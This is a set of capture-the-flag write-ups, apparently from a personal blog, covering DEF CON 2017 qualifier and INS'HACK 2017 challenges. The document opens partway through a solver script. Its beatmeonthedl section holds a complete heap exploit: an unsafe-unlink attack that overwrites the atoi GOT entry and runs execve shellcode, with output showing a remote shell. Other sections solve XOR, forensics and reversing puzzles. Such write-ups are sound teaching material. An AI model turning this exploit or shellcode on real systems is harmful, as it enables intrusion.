r = remote(‘cm2k-magic_b46299df0752c152a8e0c5f0a9e5b8f0.quals.shallweplayaga.me’, 12001)
l = r.recvline()
print l
 
while 1:
 
    filename = r.recvline().split(“\n”)[0]
 
    print filename
    flag_word = extract_flag(filename)
    print flag_word
 
    r.sendline(base64.b64encode(flag_word))

 

 

$ python solve_magic2.py
[+] Opening connection to cm2k-magic_b46299df0752c152a8e0c5f0a9e5b8f0.quals.shallweplayaga.me on port 12001: Done
send your solution as base64, followed by a newline
f1e56ab8dc43fd0e33b79affdb5ac47911206c9a05f82715dbd7882c85fffd59
didn’t surprise Tom, though
b6d7ff0e83f6ac0ac741bc2c64b5b46dc2a274dd83db63c5e41c36133ac1be43
tive work under terms
5b0490ea26d5548596ca99c3f9592c5d16228a6ddeab3aa45a0dc7fabc14ca20
fore I collapsed against a wall, head down.
cb65c85e9d6d3efffd23e1580510bb6f45b2ff8c05c84b9e8e377d3c03ffb34d
n a twinkl
abe60de564ff191f6a001dd43fb4285f74735498bc39c3df63d19bbb591cb01c
burned all his reputation capita
f96c1a402d0757f8b07baef25c806774be614fb9b7271172655e1195d37852f7
 immediate
28a4f8a23587d1919639ff4114e18c7653ddfff4d338f88247820ac61dd1ef54
ut of a printe
a210dea1a1b877ad178d1718c2ccb1fd5e5e0484eeb907e05dbcca2a07ee0e85
gone. A quick chec
fd9431be8119528acf27853559662473ae4f8a2cf7b2e1689fe9fb12943e9802
y rocked in their seats under the blast of
323da730235582b75113790bd7b50c1803386416ebdd45e5ece14c2394f8720c
push it out
The flag is: a color map of the sun sokemsUbif

beatmeonthedl

 

This is one of famous heap exploitation challenge, I can solve using Unsafe Unlink attack (House of Einherjar).

 

from pwn import *
#r = process(‘./beatmeonthedl’)
r = remote(‘beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me’, 6969)
shellcode = “\x90\x90\x90\x90\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05”
raw_input()
# leak stack address -null termination bug in username-
l = r.recvuntil(“Enter username: “)
print l
r.sendline(“aaaaaaaaaaaaaaaa”)
l = r.recvuntil(“Enter username: “)
stack_addr = u64(l.split(“\n”)[0].split(“aaaaaaaaaaaaaaaa”)[1].ljust(8,”\x00″))
log.info(“[+] stack_addr = ” + hex(stack_addr))
# leak heap address -null termination bug in password-
l = r.recvuntil(“Enter username: “)
print l
r.sendline(“mcfly”)
l = r.recvuntil(“Enter Pass: “)
print l
r.sendline(“aaaaaaaaaaaaaaaaaaaaaaaa”)
l = r.recvuntil(“Enter username: “)
heap_addr = u64(l.split(“\n”)[0].split(“aaaaaaaaaaaaaaaaaaaaaaaa”)[1].ljust(8,”\x00″)) -0x10
log.info(“[+] heap_addr = ” + hex(heap_addr))
# login
r.sendline(“mcfly”)
l = r.recvuntil(“Enter Pass: “)
r.sendline(“awesnap”)
l = r.recvuntil(“| “)
print l
def add_req(data):
    log.info(“add_req : ” + data)
    r.sendline(“1”)
    l = r.recvuntil(“Request text > “)
    print l
    r.sendline(data)
    l = r.recvuntil(“| “)
    print l
def print_req():
    log.info(“print_req : “)
    r.sendline(“2”)
    l = r.recvuntil(“| “)
    print l
def delete_req(index):
    log.info(“delete_req : ” + index)
    r.sendline(“3”)
    l = r.recvuntil(“choice: “)
    print l
    r.sendline(index)
    l = r.recvuntil(“| “)
    print l
def update_req(index, data):
    log.info(“update_req : ” +index+”:”+ data)
    r.sendline(“4”)
    l = r.recvuntil(“choice: “)
    print l
    r.sendline(index)
    l = r.recvuntil(“data: “)
    print l
    r.sendline(data)
    l = r.recvuntil(“| “)
    print l
def exit():
    log.info(“exit : “)
    r.sendline(“5”)
    l = r.recvall()
    print l
# add request 5-times for Unsafe Unlink attack (House of Einherjar)
add_req(“aaaaaaaaaa”)
add_req(“bbbbbbbbbb”)
add_req(“bbbbbbbbbb”)
add_req(“bbbbbbbbbb”)
add_req(“bbbbbbbbbb”)
addr_atoi = 0x00000000006099D8
# Make fake chunk and fd->reqlist[4]
update_req(“4”,”b”*(48+16)+p64(0x0)+p64(0xe41)+p64(0x609e90-0x18)+p64(0x609e90-0x10))
# Make fake used chunk for causing unlink
update_req(“3”,”b”*48+p64(0x0)+p64(0x53)+”\x00″*48)
# Cause unlink and reqlist[2] is overwritten to the address(0x609e90-0x18)
delete_req(“4”)
# before overwritten got, prepare shellcode in heap.
update_req(“3”,shellcode)
# Overwrite reqlist[0] to got_atoi address
update_req(“2”,”A”*8+p64(addr_atoi))
# got_atoi address is overwritten to shellcode address.
update_req(“0”,p64(heap_addr+0x110))

 

 

$ python solve_beatmeonthedl.py
[+] Starting local process ‘./beatmeonthedl’: Done
[+] Opening connection to beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me on port 6969: Done
         __      __       .__                                  __
        /  \    /  \ ____ |  |   ____  ____   _____   ____   _/  |_  ____
        \   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \  \   __\/  _ \
         \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |  | (  <_> )
          \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  |__|  \____/
               \/       \/          \/            \/     \/
      __  .__             .__         .__                 _____    __  .__
    _/  |_|  |__   ____   |  | _____  |__|______    _____/ ____\ _/  |_|  |__   ____
    \   __\  |  \_/ __ \  |  | \__  \ |  \_  __ \  /  _ \   __\  \   __\  |  \_/ __ \
     |  | |   Y  \  ___/  |  |__/ __ \|  ||  | \/ (  <_> )  |     |  | |   Y  \  ___/
     |__| |___|  /\___  > |____(____  /__||__|     \____/|__|     |__| |___|  /\___  >
               \/     \/            \/                                      \/     \/
  _________.__                .___              __________                __
 /   _____/|  |__ _____     __| _/______  _  __ \______   \_______  ____ |  | __ ___________  ______
 \_____  \ |  |  \\__  \   / __ |/  _ \ \/ \/ /  |    |  _/\_  __ \/  _ \|  |/ \// __ \_  __ \/  ___/
 /        \|   Y  \/ __ \_/ /_/ (  <_> )     /   |    |   \ |  | \(  <_> )    <\  ___/|  |  \/\___ \
/_______  /|___|  (____  /\____ |\____/ \/\_/    |______  / |__|   \____/|__|_ \\___  >__|    /____ >
        \/      \/     \/      \/                       \/                    \/    \/             \/
Enter username:
[*] [+] stack_addr = 0x7fff5cee20f0
Invalid user:
(snip)
[*] update_req : 0:\x10\xa1�\x00\x00\x00\x00
0) P\x1f�)N\x7f
1)
2) AAAAAAAAؙ`
3) \x90\x90\x90\x90\x901�H\xbbѝ\x96\x91Ќ\x97\xffH��ST_\x99RWT^\xb0;\x0f\x05
bbbbbbbbbbbbbbb
choice:
data:
I) Request Exploit.
II) Print Requests.
III) Delete Request.
IV) Change Request.
V) Go Away.
|
[*] Switching to interactive mode
$
$
$ ls
beatmeonthedl
flag
$ cat flag
The flag is: 3asy p33zy h3ap hacking!!
$

Tags: wordpress

May 01, 2017 at 10:06AM
Open in Evernote

20170407_INS’HACKCTF Writeup

Xoreing Web 50

 

First I access to the web site, and I can see below login form.

After some try, I recognized that there is one Javascript file (script) in this site.

And if input “admin” in Login area, this script run and compare encoded password to “NeAM+bh_saaES_mFISYYu}nYw}”.

 

At first, I try password “aaaaaaaaaaaaaaaaaaaaaaaaaaaa”, encoded password =”WaWaWaWaWaWaWaWaWaWaWaWaWaWa”.

Encode method is that odd-numbered character is remained and even-numbered character is replaced password-character xor-ed by “6”.

 

Finally, make below script and solve it.

enc = “NeAM+bh_saaES_mFlSYYu}nYw}”
flag = “”
print len(enc)
count = 0
for i in enc:
     if count %2 ==0:
          flag += chr(ord(i)^ord(“6”))
     else:
          flag += i
     count +=1
print flag

Remote Multimedia Controller FOR 75

This file contain strange base64-encoded string.

And try to base64-decode many times, I get flag.

 
 
 

Secure Garden Shed V1 – REV 200

First I try to execute this.

$ ./sgs-exec-release-p lock.sgsc
Enter pasword ([a-z]):
aaaa
Sorry but the password you gave is wrong…

 

So when this file execute, ./sgs-exec-release-p decode lock.sgsc and execute it sequentially.

I think that when user input aaaa, this may call “read” function so I set break point of this function.

 

gdb-peda$ b read
Breakpoint 6 at 0xf7ec8980: file ../sysdeps/unix/syscall-template.S, line 84.
gdb-peda$ c
gdb-peda$ c
Continuing.
Enter pasword ([a-z]):
[———————————-registers———————————–]
EAX: 0x0
EBX: 0xf7fa5000 –> 0x1b1db0
ECX: 0x5655c508 –> 0x0
EDX: 0x400
ESI: 0xf7fa55a0 –> 0xfbad2288
EDI: 0xf7fa5d60 –> 0xfbad2a84
EBP: 0xffffcb38 –> 0xffffcba8 –> 0xffffcc08 –> 0x0
ESP: 0xffffcafc –> 0xf7e5d267 (<_IO_new_file_underflow+295>:    add    esp,0x10)
EIP: 0xf7ec8980 (<read>:    cmp    DWORD PTR gs:0xc,0x0)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
   0xf7ec897b:    xchg   ax,ax
   0xf7ec897d:    xchg   ax,ax
   0xf7ec897f:    nop
=> 0xf7ec8980 <read>:    cmp    DWORD PTR gs:0xc,0x0
   0xf7ec8988 <read+8>:    jne    0xf7ec89b0 <read+48>
   0xf7ec898a <__read_nocancel>:    push   ebx
   0xf7ec898b <__read_nocancel+1>:    mov    edx,DWORD PTR [esp+0x10]
   0xf7ec898f <__read_nocancel+5>:    mov    ecx,DWORD PTR [esp+0xc]
gdb-peda$ fin
 
..(fin command many times)..
gdb-peda$ fin
Run till exit from #0  0xf7e58af1 in _IO_getc (fp=0xf7fa55a0 <_IO_2_1_stdin_>) at getc.c:38
[———————————-registers———————————–]
EAX: 0xa (‘\n’)
EBX: 0x5655af98 –> 0x5eb8
ECX: 0xa (‘\n’)
EDX: 0xf7fa687c –> 0x0
ESI: 0xec
EDI: 0x5655c008 –> 0x0
EBP: 0xffffcc08 –> 0x0
ESP: 0xffffcbb0 –> 0xf7fa55a0 –> 0xfbad2288
EIP: 0x5655717a (lea    edx,[eax-0x61])
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
   0x5655716f:    mov    eax,DWORD PTR [esp+0x18]
   0x56557173:    push   DWORD PTR [eax]
   0x56557175:    call   0x56555640
=> 0x5655717a:    lea    edx,[eax-0x61]
   0x5655717d:    add    esp,0x10
   0x56557180:    cmp    edx,0x19
   0x56557183:    ja     0x565573e4
   0x56557189:    mov    edx,DWORD PTR [ebx+0x88]
 
…(Then I try to find part of flag)…
gdb-peda$ find INSA          
Searching for ‘INSA’ in: None ranges
Found 2 results, display max 2 items:
   [heap] : 0x5655c02e (“INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)}”)
lock.sgsc : 0xf7fd31f2 (“INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)}”)
 
…(Then investigate near of flag string)….
gdb-peda$ x/100wx 0xf7fd31f2-0x100
0xf7fd30f2:    0x54000114    0x5c000918    0xa4009918    0xd000c518
0xf7fd3102:    0x00006830    0x00000ab4    0x00800dc0    0x00007620
0xf7fd3112:    0xf000006c    0x54800b5c    0xe800006c    0x00801d84
0xf7fd3122:    0x008000b4    0x000004c0    0x00001d84    0x008000b4
0xf7fd3132:    0x008001c0    0x00000430    0x00000040    0x00005230
0xf7fd3142:    0x00200040    0x00001d84    0x008000b4    0x008001c0
0xf7fd3152:    0x00005230    0x00200040    0xe8801d8c    0x008001c0
0xf7fd3162:    0x00005230    0x00200040    0x01800ad4    0x5400006c
0xf7fd3172:    0x00800dc8    0x00005230    0x00200040    0x7461642e
0xf7fd3182:    0x0000b061    0xffff0000    0x6874ffff    0x73697369
0xf7fd3192:    0x72747361    0x70676e6f    0x70737361    0x73617268
0xf7fd31a2:    0x63656265    0x65737561    0x73697469    0x6c616572
0xf7fd31b2:    0x6f6c796c    0x6e61676e    0x6e617264    0x616d6f64
0xf7fd31c2:    0x65687474    0x75646e65    0x6569696f    0x6567636e
0xf7fd31d2:    0x65570072    0x64206c6c    0x21656e6f    0x72654820
0xf7fd31e2:    0x73692065    0x756f7920    0x6c662072    0x203a6761
0xf7fd31f2:    0x41534e49    0x7375437b    0x5f6d3074    0x4e5f3531
0xf7fd3202:    0x535f7430    0x34455f30    0x745f7973    0x33525f30
0xf7fd3212:    0x73723376    0x293b5f33    0x6f53007d    0x20797272
0xf7fd3222:    0x20747562    0x20656874    0x73736170    0x64726f77
0xf7fd3232:    0x756f7920    0x76616720    0x73692065    0x6f727720
0xf7fd3242:    0x2e2e676e    0x6e45002e    0x20726574    0x77736170
0xf7fd3252:    0x2064726f    0x2d615b28    0x3a295d7a    0x00000000
0xf7fd3262:    0x00000000    0x00000000    0x00000000    0x00000000
0xf7fd3272:    0x00000000    0x00000000    0x00000000    0x00000000
gdb-peda$ x/100s 0xf7fd3182
0xf7fd3182:    “a\260”
0xf7fd3185:    “”
0xf7fd3186:    “”
0xf7fd3187:    “”
0xf7fd3188:    “\377\377\377\377thisisastrongpassphrasebecauseitisreallylongandrandomattheenduoiiencger”
0xf7fd31d4:    “Well done! Here is your flag: INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)}”
0xf7fd321c:    “Sorry but the password you gave is wrong…”
0xf7fd3248:    “Enter pasword ([a-z]):”
0xf7fd325f:    “”
0xf7fd3260:    “”

 

So “thisisastrongpassphrasebecauseitisreallylongandrandomattheenduoiiencger” is password and “INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)} ” is flag

Hiding In Plain Sight – FOR 100

There is jpg file in inSa (strange name!?) chank in PNG file.

And get the flag!